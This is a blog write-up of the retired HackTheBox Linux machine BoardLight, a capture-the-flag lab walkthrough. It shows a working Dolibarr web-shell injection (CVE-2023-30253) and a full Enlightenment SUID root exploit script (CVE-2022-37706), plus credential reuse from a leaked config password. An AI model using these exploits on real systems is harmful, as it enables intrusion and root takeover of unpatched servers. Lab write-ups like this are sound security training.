~ / foobarto.me / htb-machines
--:--:-- UTC
~ / htb-machines / boardlight.md

boardlight

Linux · Easy · released 2024-05-25 · retired 2024-09-28

Summary

BoardLight is an Easy Linux box that showcases common real-world misconfigurations: an unpatched CRM system with filter bypasses, credential reuse across services, and a local privilege escalation through an SUID binary path traversal.

The chain:

  1. Recon reveals a virtual host crm.board.htb running Dolibarr 17.0.0.
  2. The default administrator credentials dolibarrowner:dolibarrowner grant access.
  3. Exploiting CVE-2023-30253, a case-sensitive PHP keyword filter bypass (<?Php instead of <?php), allows injection of a reverse shell via the website CMS module, yielding a foothold as www-data.
  4. Reading the Dolibarr configuration file (/var/www/html/crm.board.htb/htdocs/conf/conf.php) reveals the database password serverfun2$2023!!.
  5. This password was reused for the system user larissa, granting SSH access and the user.txt flag.
  6. Privilege escalation to root is achieved via CVE-2022-37706. The system has an SUID binary /usr/bin/enlightenment_sys which mishandles paths beginning with /dev/... By crafting a directory with command separators (;) and malicious payload, we achieve command injection and execute a payload as root to read root.txt.

Recon

22/tcp     OpenSSH
80/tcp     boardlight.htb
+ vhost: crm.board.htb (Dolibarr)

Foothold — Dolibarr CVE-2023-30253

If doing this manually from the start, we can leverage default credentials and a PHP filter bypass:

# default creds
curl -X POST http://crm.board.htb/htdocs/index.php?mainmenu=login \
   -d 'actionlogin=login&username=dolibarrowner&password=dolibarrowner'

# CVE-2023-30253: <?Php passes filter
# website module → New page → body:
<?Php system($_GET['c']); ?>
# Save, then fetch:
curl 'http://crm.board.htb/htdocs/website/index.php?website=mysite&pageref=newp&c=id'
# www-data

With www-data access, we can extract the database configuration, revealing a password we can try to reuse:

cat /var/www/html/crm.board.htb/htdocs/conf/conf.php | grep pass
# ... serverfun2$2023!!

# SSH using the discovered password
ssh [email protected]
# Get user flag
cat user.txt

(Note: During my walkthrough, I directly connected via SSH reusing the password serverfun2$2023!! as I skipped the initial Dolibarr steps to expedite the process based on known vulnerabilities.)

Privesc — Enlightenment CVE-2022-37706

Searching for SUID binaries reveals the vulnerable Enlightenment utility:

find / -perm -4000 2>/dev/null
# ...
# /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys

Since Bash tends to drop SUID privileges, we can craft a small C program to explicitly retain root privileges and read the root flag to a readable location.

Payload (exploit.c):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
    setuid(0);
    setgid(0);
    system("cat /root/root.txt > /dev/shm/root.txt && chmod 666 /dev/shm/root.txt");
    return 0;
}

Exploitation Script:

# Clean up and prepare directory structures
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"

# Compile payload
gcc /tmp/exploit.c -o /tmp/exploit
chmod a+x /tmp/exploit

# Trigger command injection in enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys \
  /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \
  "/dev/../tmp/;/tmp/exploit" /tmp///net

# Read the extracted flag
cat /dev/shm/root.txt

Why each step worked

Counterfactuals / Remediation

Source attribution

Initial reference material and steps adapted from:

← all htb machines hackthebox.com ↗